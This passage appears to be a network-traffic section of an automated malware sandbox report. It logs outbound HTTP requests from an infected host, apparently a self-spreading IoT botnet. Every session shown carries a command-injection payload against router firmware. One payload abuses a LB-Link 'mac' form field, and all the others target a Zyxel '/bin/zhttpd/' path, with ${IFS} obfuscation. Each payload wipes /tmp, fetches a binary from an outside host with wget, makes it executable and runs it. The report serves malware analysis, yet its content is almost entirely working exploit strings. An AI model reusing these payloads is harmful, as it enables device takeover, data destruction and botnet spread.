                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        714192.168.2.2352800172.65.92.1808080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.555732012 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        715192.168.2.2357502207.9.163.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180237055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        716192.168.2.2343546131.183.85.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180303097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        717192.168.2.2343742134.154.126.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180331945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        718192.168.2.233930289.208.111.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180391073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        719192.168.2.23501742.232.55.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180450916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        720192.168.2.233527841.198.119.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180507898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        721192.168.2.235963234.47.140.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180809975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        722192.168.2.235860484.49.179.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180859089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        723192.168.2.235892864.52.148.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:22.180896997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        724192.168.2.2342792169.15.180.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186002970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        725192.168.2.2355134141.61.214.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186049938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        726192.168.2.2333956124.27.132.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186088085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        727192.168.2.233854032.251.53.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186145067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        728192.168.2.2354880149.119.71.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186187029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        729192.168.2.236080461.212.16.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186234951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        730192.168.2.2350244208.134.9.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186274052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        731192.168.2.2352088141.42.97.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186321974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        732192.168.2.2358226166.34.209.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186376095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        733192.168.2.235135037.88.22.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186444998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        734192.168.2.2350260192.210.66.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186482906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        735192.168.2.235435272.20.95.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186523914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        736192.168.2.235393081.154.113.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186567068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        737192.168.2.2344562194.174.145.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186621904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        738192.168.2.2338270188.49.188.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186683893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        739192.168.2.2333814129.225.171.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186757088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        740192.168.2.234066437.126.39.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186791897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        741192.168.2.235331084.203.79.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186868906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        742192.168.2.2360650170.172.173.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186919928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        743192.168.2.2335372195.60.31.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.186961889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        744192.168.2.2341644157.178.150.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187005043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        745192.168.2.234624225.2.30.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187055111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        746192.168.2.235576047.255.243.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187112093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        747192.168.2.235632888.7.130.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187170982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        748192.168.2.233750236.94.158.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187233925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        749192.168.2.234418282.49.242.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187282085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        750192.168.2.2349266208.86.9.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187325954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        751192.168.2.234488683.168.188.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187381983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        752192.168.2.235628261.245.251.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187414885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        753192.168.2.2342282168.66.108.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187458038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        754192.168.2.233561240.190.173.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187509060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        755192.168.2.2359738154.5.44.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187545061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        756192.168.2.2352034111.146.217.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187606096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        757192.168.2.2336766180.64.127.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187660933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        758192.168.2.234713267.125.74.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187715054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        759192.168.2.23366789.167.83.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187777996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        760192.168.2.2342126149.191.125.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187830925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        761192.168.2.2357820134.106.155.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187915087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        762192.168.2.2340356178.196.92.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.187946081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        763192.168.2.2344740198.22.200.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188004017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        764192.168.2.2333304193.184.32.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188054085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        765192.168.2.2348062106.123.159.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188108921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        766192.168.2.2332868180.212.158.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188155890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        767192.168.2.235240812.172.12.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188182116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        768192.168.2.23460361.253.80.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188270092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        769192.168.2.235573864.183.121.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188308954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        770192.168.2.2341472161.61.241.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188364983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        771192.168.2.2333470129.106.121.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188435078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        772192.168.2.233316866.129.49.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188497066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        773192.168.2.233452290.60.75.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188565016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        774192.168.2.235234867.251.31.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188610077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        775192.168.2.23545582.240.173.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188658953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        776192.168.2.2347162194.84.182.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188687086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        777192.168.2.235402844.112.84.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188739061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        778192.168.2.235957298.48.15.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188783884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        779192.168.2.23367068.169.13.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188843012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        780192.168.2.2345548138.106.80.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:23.188905001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;

